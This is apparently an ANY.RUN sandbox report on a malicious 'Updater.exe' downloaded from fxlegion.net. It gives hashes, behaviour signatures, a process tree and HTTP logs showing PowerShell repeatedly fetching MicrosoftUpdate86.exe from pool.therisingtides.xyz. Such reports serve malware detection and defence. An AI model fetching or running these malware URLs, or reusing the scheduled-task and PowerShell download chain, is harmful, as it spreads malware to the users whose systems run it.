analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://fxlegion.net/Updater.exe

Full analysis: https://app.any.run/tasks/43e37e5f-f13c-41f2-89c4-019ee8645cc6
Verdict: Malicious activity
Analysis date: June 19, 2019, 09:21:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MD5:

007B46443B171A65A434654DB1470311

SHA1:

51095D89639456112C1C74786A4E0B8B272B39D8

SHA256:

425D44463CDA1AB264839D6417403F82D82DBBC20CD6F12D7A8C9BB86E969BA8

SSDEEP:

3:N1KYIKgKEE6:CY3Pk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Updater.exe (PID: 540)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3140)
      • schtasks.exe (PID: 2964)
      • schtasks.exe (PID: 3864)
      • schtasks.exe (PID: 3124)

    • Uses Task Scheduler to run other applications

      • CMD.exe (PID: 1244)

    • Writes to a start menu file

      • xcopy.exe (PID: 1876)

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3880)
      • cmd.exe (PID: 3048)
      • cmd.exe (PID: 3052)

    • Executes PowerShell scripts

      • cmd.exe (PID: 1892)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2956)
      • cmd.exe (PID: 3220)
      • cmd.exe (PID: 312)
      • cmd.exe (PID: 1084)
      • cmd.exe (PID: 2288)
      • cmd.exe (PID: 1464)
      • cmd.exe (PID: 952)
      • cmd.exe (PID: 2068)
      • cmd.exe (PID: 2356)
      • cmd.exe (PID: 1472)
      • cmd.exe (PID: 2332)
      • cmd.exe (PID: 2368)
      • cmd.exe (PID: 2596)
      • cmd.exe (PID: 3400)
      • cmd.exe (PID: 2000)
      • cmd.exe (PID: 1668)
      • cmd.exe (PID: 3776)
      • cmd.exe (PID: 3552)
      • cmd.exe (PID: 2972)
      • cmd.exe (PID: 3588)
      • cmd.exe (PID: 2516)
      • cmd.exe (PID: 3452)
      • cmd.exe (PID: 2184)
      • cmd.exe (PID: 2836)
      • cmd.exe (PID: 3364)
      • cmd.exe (PID: 1092)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • chrome.exe (PID: 3392)
      • xcopy.exe (PID: 1332)

    • Creates files in the user directory

      • xcopy.exe (PID: 1332)
      • xcopy.exe (PID: 3784)
      • xcopy.exe (PID: 1876)
      • powershell.exe (PID: 1812)
      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 1576)
      • powershell.exe (PID: 3536)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 2540)
      • powershell.exe (PID: 2532)
      • powershell.exe (PID: 3476)
      • powershell.exe (PID: 3252)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 2848)
      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 1532)
      • powershell.exe (PID: 3012)
      • powershell.exe (PID: 3004)
      • powershell.exe (PID: 2064)
      • powershell.exe (PID: 2556)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 3420)
      • powershell.exe (PID: 2264)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 2320)
      • powershell.exe (PID: 2212)
      • powershell.exe (PID: 1740)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 3996)
      • powershell.exe (PID: 3652)
      • powershell.exe (PID: 3828)
      • powershell.exe (PID: 3604)
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 1512)
      • powershell.exe (PID: 3492)
      • powershell.exe (PID: 2752)
      • powershell.exe (PID: 2912)
      • powershell.exe (PID: 756)
      • powershell.exe (PID: 2608)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 916)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 3124)
      • powershell.exe (PID: 3488)
      • powershell.exe (PID: 936)
      • powershell.exe (PID: 2308)
      • powershell.exe (PID: 3380)
      • powershell.exe (PID: 3676)
      • powershell.exe (PID: 1652)
      • powershell.exe (PID: 3344)
      • powershell.exe (PID: 2324)
      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 3696)
      • powershell.exe (PID: 3280)
      • powershell.exe (PID: 3548)
      • powershell.exe (PID: 852)
      • powershell.exe (PID: 1832)
      • powershell.exe (PID: 1968)

    • Starts CMD.EXE for commands execution

      • Updater.exe (PID: 540)
      • WScript.exe (PID: 3640)
      • WScript.exe (PID: 1388)
      • WScript.exe (PID: 2112)
      • WScript.exe (PID: 2684)
      • WScript.exe (PID: 3540)
      • WScript.exe (PID: 2136)
      • WScript.exe (PID: 3496)
      • WScript.exe (PID: 2072)
      • WScript.exe (PID: 2176)
      • WScript.exe (PID: 2624)
      • WScript.exe (PID: 1076)
      • WScript.exe (PID: 2668)
      • WScript.exe (PID: 300)
      • WScript.exe (PID: 2132)
      • WScript.exe (PID: 2404)
      • WScript.exe (PID: 608)
      • WScript.exe (PID: 3312)
      • cmd.exe (PID: 3048)
      • WScript.exe (PID: 3672)
      • WScript.exe (PID: 1644)
      • WScript.exe (PID: 964)
      • WScript.exe (PID: 3616)
      • WScript.exe (PID: 3136)
      • WScript.exe (PID: 324)
      • WScript.exe (PID: 2776)
      • WScript.exe (PID: 3260)
      • WScript.exe (PID: 900)
      • WScript.exe (PID: 2616)
      • WScript.exe (PID: 1156)
      • WScript.exe (PID: 540)
      • WScript.exe (PID: 904)
      • WScript.exe (PID: 3716)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 2364)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2316)

    • Executes scripts

      • CMD.exe (PID: 1244)
      • cmd.exe (PID: 3880)
      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 1576)
      • powershell.exe (PID: 3252)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 3004)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 1532)
      • powershell.exe (PID: 2556)
      • powershell.exe (PID: 2064)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 3420)
      • powershell.exe (PID: 3996)
      • powershell.exe (PID: 1740)
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 1512)
      • powershell.exe (PID: 3828)
      • powershell.exe (PID: 2608)
      • powershell.exe (PID: 3124)
      • powershell.exe (PID: 756)
      • powershell.exe (PID: 916)
      • powershell.exe (PID: 936)
      • powershell.exe (PID: 3488)
      • powershell.exe (PID: 3676)
      • powershell.exe (PID: 3380)
      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 1832)
      • powershell.exe (PID: 852)

    • Uses TASKLIST.EXE to query information about running processes

      • cmd.exe (PID: 3880)

    • Starts Internet Explorer

      • cmd.exe (PID: 3048)

    • Application launched itself

      • cmd.exe (PID: 3048)

  • INFO

    • Reads Internet Cache Settings

      • chrome.exe (PID: 3392)
      • iexplore.exe (PID: 3008)

    • Manual execution by user

      • Updater.exe (PID: 540)

    • Application launched itself

      • chrome.exe (PID: 3392)

    • Creates files in the user directory

      • iexplore.exe (PID: 3008)

    • Changes internet zones settings

      • iexplore.exe (PID: 2344)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
234
Monitored processes
162
Malicious processes
88
Suspicious processes
0

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs updater.exe no specs cmd.exe no specs xcopy.exe no specs xcopy.exe schtasks.exe no specs timeout.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs xcopy.exe wscript.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs ping.exe no specs attrib.exe no specs attrib.exe no specs attrib.exe no specs wscript.exe no specs attrib.exe no specs ping.exe no specs cmd.exe no specs wscript.exe no specs ping.exe no specs cmd.exe no specs ping.exe no specs tasklist.exe no specs findstr.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe chrome.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs chrome.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs ping.exe no specs findstr.exe no specs cmd.exe no specs wmic.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe iexplore.exe iexplore.exe ping.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe ping.exe no specs findstr.exe no specs cmd.exe no specs wmic.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3392"C:\Program Files\Google\Chrome\Application\chrome.exe" http://fxlegion.net/Updater.exeC:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
73.0.3683.75
3800"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6cd70f18,0x6cd70f28,0x6cd70f34C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
2864"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3388 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
2352"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=13757712096839986545 --mojo-platform-channel-handle=968 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
3108"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --service-pipe-token=1267025299571584538 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1267025299571584538 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
2808"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --service-pipe-token=14499659466139193942 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=14499659466139193942 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
1696"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --service-pipe-token=11342234035670150271 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=11342234035670150271 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2240 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
4084"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --disable-gpu-sandbox --use-gl=disabled --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=6386663286184820684 --mojo-platform-channel-handle=3672 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
540"C:\Users\admin\Downloads\Updater.exe" C:\Users\admin\Downloads\Updater.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1244CMD /C "copy.bat"C:\Windows\system32\CMD.exeUpdater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
31 496
Read events
28 113
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
125
Text files
139
Unknown types
6

Dropped files

PID
Process
Filename
Type
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\dd45362e-e371-4632-8fdc-7d48a9877f42.tmp
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0
MD5:
SHA256:
3392chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
30
TCP/UDP connections
101
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3392
chrome.exe
GET
301
66.42.48.122:80
http://fxlegion.net/Updater.exe
US
html
162 b
suspicious
2344
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2264
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
3536
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
3864
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
2848
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
1812
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
3396
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
2540
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
3012
powershell.exe
GET
301
66.42.48.122:80
http://pool.therisingtides.xyz/MicrosoftUpdate86.exe
US
html
162 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3392
chrome.exe
172.217.18.100:443
www.google.com
Google Inc.
US
whitelisted
3392
chrome.exe
172.217.22.110:443
sb-ssl.google.com
Google Inc.
US
whitelisted
3392
chrome.exe
172.217.18.163:443
ssl.gstatic.com
Google Inc.
US
whitelisted
3392
chrome.exe
172.217.22.35:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3392
chrome.exe
66.42.48.122:443
fxlegion.net
US
suspicious
3392
chrome.exe
66.42.48.122:80
fxlegion.net
US
suspicious
1812
powershell.exe
66.42.48.122:80
fxlegion.net
US
suspicious
172.217.18.163:443
ssl.gstatic.com
Google Inc.
US
whitelisted
3392
chrome.exe
172.217.16.141:443
accounts.google.com
Google Inc.
US
suspicious
2532
powershell.exe
66.42.48.122:80
fxlegion.net
US
suspicious

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.22.35
whitelisted
fxlegion.net
  • 66.42.48.122
suspicious
accounts.google.com
  • 172.217.16.141
shared
www.google.com
  • 172.217.18.100
whitelisted
sb-ssl.google.com
  • 172.217.22.110
whitelisted
ssl.gstatic.com
  • 172.217.18.163
whitelisted
pool.therisingtides.xyz
  • 66.42.48.122
suspicious
www.gstatic.com
  • 172.217.16.163
whitelisted
clients1.google.com
  • 172.217.16.174
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted

Threats

PID
Process
Class
Message
1812
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
1812
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
3536
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3536
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
3476
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3476
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
2532
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
2532
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
2540
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
2540
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://fxlegion.net/Updater.exe